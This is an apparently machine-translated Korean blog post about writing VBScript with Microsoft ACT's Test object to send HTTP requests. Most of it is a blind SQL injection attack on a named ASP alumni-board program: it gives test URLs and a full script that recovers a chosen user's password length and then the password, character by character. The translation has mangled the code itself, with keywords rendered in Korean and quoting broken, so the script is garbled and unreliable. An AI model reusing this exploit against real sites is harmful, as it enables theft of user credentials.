VBS를 사용 하 여 SQL 주입 등 80 포트 공격 스크립트 작성

중간 거래 SEO 진단 Taobao 게스트 클라우드 호스트 기술 홀

출처: http://www.viphot.com/

실수로 VBS 스크립트 어젯밤 기계에 협조 하 고 갑자기 발견 개체 Test.sendrequest ("http://" & G_sserver & "/ testfiles/browser.asp") 내가 전에 본적이 없어. 개체는 본 되지, 있지만 의미 분명 하다: HTTP 요청을 보냅니다. WMI 스크립트 API 있어야 했다 하지만 그것은 개체를 만든 하는 문을 찾지 이며 Microsoft Act에서 Microsoft Act Visual Studio.NET에서 사이트를 테스트 하기 위한 도구 (오랫동안, 유용이 미래에?). 경우, 어떻게 볼이?), 이전 개설, 하지만 그래서 내가 도움 파일을 열고 그것을 사용 하는 방법을 공부를 하지 않았다 (MSDN은 체크: Ms-help://ms. Vscc/ms입니다. msdnvs.2052/act/htm/actml_main.htm), 대략 읽고, 예기치 않게 개체 (알 수 없습니다이 정확 하지 않으면), 개체 및 특성을 나열 하 고, HTTP 클라이언트의 완전 한 세트는 다음은 테스트 개체 모델을 볼 수 있습니다 응용 프로그램 개체 모델 이기도 하 고 이해에 관심을가지고 하는 경우 참조 MSDN, 난 아직도 배우고.

-연결 개체

Close 메서드

보내기 방법

IsOpen 속성

Port 속성

Redirectdepth 속성

서버 속성

UseSSL 속성

-쿠키 개체 / / 테스트 사이트 이므로 스크립트 프로그램을 사용 하 여 여러 사용자를 시뮬레이션 하기 위해이 사용할 수 있습니다 훼손, hehe 하 사용할 수 있는 각 사용자에 대 한 쿠키를 설정 하

만료 속성

Name 속성

Path 속성

Value 속성

-쿠키 개체

메서드 추가

제거 방법

RemoveAll 메서드

Count 속성

Item 속성

-헤더 개체

Name 속성

Value 속성

-개체 요청

Body 속성

코드 페이지 속성

Encodebody 속성

EncodeQueryAsUTF8 속성

Headers 속성

Httpversion 속성

Path 속성

Responsebuffersize 속성

Verb 속성

-응답 개체

Body 속성 / / HTTP 응답의 텍스트를 가져옵니다. 만 응답 버퍼의 본문 부분을 반환합니다.

코드 페이지 속성

Bytesrecv 속성

BytesSent 속성

ContentLength 속성

Headers 속성

Headersize 속성

Httpversion 속성

Path 속성

Port 속성

ResultCode 속성

HTTP 상태 코드

서버 속성

TTFB 속성

Ttlb 속성

UseSSL 속성

-테스트 개체

CreateConnection 메서드

Createrequest 메서드

Getcurrentuser 메서드

Getglobalindex 메서드

Getglobalvariable 메서드

Getnextuser 메서드

Incrementglobalindex 메서드

SendRequest 메서드

Setglobalindex 메서드

Setglobalvariable 메서드

수 면 방법

추적 방법

TraceLevel 속성

-사용자 개체

쿠키 속성

Name 속성

암호 속성

여기, 당신은 생각할 수 있습니다 테스트 사이트, 유용한 것 들을 많이의 테스트 서버, 테스트 프로그램, 쿠키 위조... 당신의 상상력, 관심이 먼저 봐로 시작 하는 문구는: Test.sendrequest ("http://" & G_sserver & "/ testfiles/browser.asp"), SendRequest 메서드의 테스트 개체의 설명:

Oresponse = Test.sendrequest (strURL)

매개 변수: strURL으로 문자열: 요청한 URL을 나타냅니다

반환 값: Oresponse 응답으로: (즉, 응답 개체 위의) 요청에 응답 하는 웹 서버에 대 한 응답을 나타내는 개체

이 개체 쉽게 눈 추적 기능, 지금 인기 있는 SQL 주입, SQL 인젝션 공격은 대부분 Perl로 작성 된, 난 할 하지 Perl의 네트워크 80 포트 공격 프로그램을 작성할 수 있습니다. C 쓰기 완전 한 소켓 프로그램은 상대적으로 복잡, VBS에 대 한이 개체 제공 가능성, 그리고 효율성을 희생 하는 비록 프로그램은 매우 간단 합니다, 하지만 우리의 신인 좋은 방법입니다, 여기에 설명 하기 위해 예입니다.

로맨틱 동문 무료 ASP 졸업생 프로그램의 집합입니다, 그리고 아마도 당신은 못 들 었, 하지만 동문 클래스 무료 웹에서 프로그램은 간주, 채택 또는 수정 (읽고 졸업생의 고등학교의 웹사이트는 다시 작성 하는 절차의이 세트에 사용), 그것의 사용 후 많은 사이트가 있다 V1.60, 쓰기 아래로 인터넷에서 내려 지난해 침실에, 인터넷에이 기사 또한 얻을 수 없습니다 최신 버전, 어쨌든, 그냥 예를 들어, hehe 그것의 사용에. 대략 몇 가지 코드는 많은 장소 수 주입, 가장 눈에 띄는 발견 읽기 (때문에 볼을 홈 페이지에) 그것에 포럼 형태의 메시지 보드 showthread.asp:

...

Topicid = 요청 ("Rootid")

Sql = "선택 항목, 게시판에서 조회 수 어디 parentid = 0 및 bbsid =" & topicid

Rs=conn.execute (SQL) 설정

...

아주 오래 된 고전적인 하나, hehe, 그것을 시도:

Http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=1

http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=2

데이터 테이블 구조 나 사용자 이름 또한 사용자 목록에서 볼 수 있습니다 다음이 예제에서는 보여 줍니다 추측 암호를 알고 무엇? 너무 쉽게? 그냥 예, 웃 지 마 아 ~ ~ 시간이 일반 항해 되지 않습니다 작성 ~ ~ 주기 감지 하는 권리는 루프를 종료 해야 하는 경우에 특히 매우 가난한 쓰기 하지만 종료 하는 방법을 생각할 수 없다 (휴식? 종료?), 하지만 프로그램에 저장 된 암호는 충분히, 추측, 약 15 초를 사용 6-비트 암호 개선의 효율성만, 향상 됩니다는 항상 펄 비교 될 수 없는 고.

이 개체를 사용 하 여 Microsoft Act를 설치 하려면 Visual Studio.NET에서 도구, 난 그래서 나는 아직도 그것을 설치 해야 REGSRV32 다른 컴퓨터와 직접 관련된 DLL을 등록 하지 못했습니다.

'*********************************************

' 로맨틱 동문 V1.60 취약점 테스트 스크립트 Luoluo 여

' 참고: Visual Studio.NET에서 행위 도구를 설치 해야

'*********************************************

' * * * 높은 효율 최적화

명시적 옵션

다음 다시 시작 오류

Dim 테스트

Dim O_response

Dim 잘못

I, j, k를 어둡게

Dim Pwd_len

Dim pwd

Dim 문자열

Dim 사용자 이름

' 커맨드 라인에서 균열을 사람의 사용자 이름

만약 WScript.Arguments.Count > 0 다음

사용자 이름 = wscript.arguments (0)

다른

사용자 이름 = "Luoluo"

End If

WScript.Echo "시작 프로 빙, 제발 기다려..."

'이 무작위 오른쪽 페이지에 로고를 보면, 때문에 그것은 두 페이지의 다른 부분에 반환으로

잘못 된 "Luoluoisachinesehacker" =

' 암호 저장

PWD = ""

' 암호의 문자 범위

문자열 "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" =

' 개체를 설정

테스트 설정 = CreateObject ("행위. 테스트 ")

' 사용자의 암호의 길이

나에 대 한 1 단계 0 ~ 128 =

' 요청을 보내, 응답 개체, 주소 길이와 세그먼트 &, 그래서으로 나눌 수 있습니다 일부 보고

O_response 설정 = Test.sendrequest ("http://192.168.101.16/txl/ShowThread.asp?") Rootid = 7% 20and% 20exists %20 (%20userid %20from %20student %20where %20len 선택 (userpwd) = ' "& 나 &" ' 20and% 20userid = ' "& 이름 &" ")" "

' 반환 된 페이지는 올바른 플래그 경우 길이 오른쪽.

경우 InStr (O_response.body, 잘못) <> 0 다음

Pwd_len = "" & 나 & ""

에 대 한 출구

End If

다음

' 사용자의 암호를 추측

J = Pwd_len 1 단계 1

K = Len (문자열) 1 단계 1

O_response 설정 = Test.sendrequest ("http://192.168.101.16/txl/ShowThread.asp?") Rootid = 7% 20and% 20exists %20 (%20userid %20from %20student %20where %20left 선택 (Userpwd, "& J &") = ' & pwd & (문자열, k, 1) 중반 & "' %20and %20userid = '" & 이름 & "")

경우 InStr (O_response.body, 잘못) <> 0 다음

PWD pwd = & 미드 (문자열, k, 1)

에 대 한 출구

End If

다음

다음

경우 다음 잘못

WScript.Echo "오류:" & Error.description

Error.clear

다른

' 출력 암호

WScript.Echo "암호:" & pwd

End If

테스트 설정 아무것도 =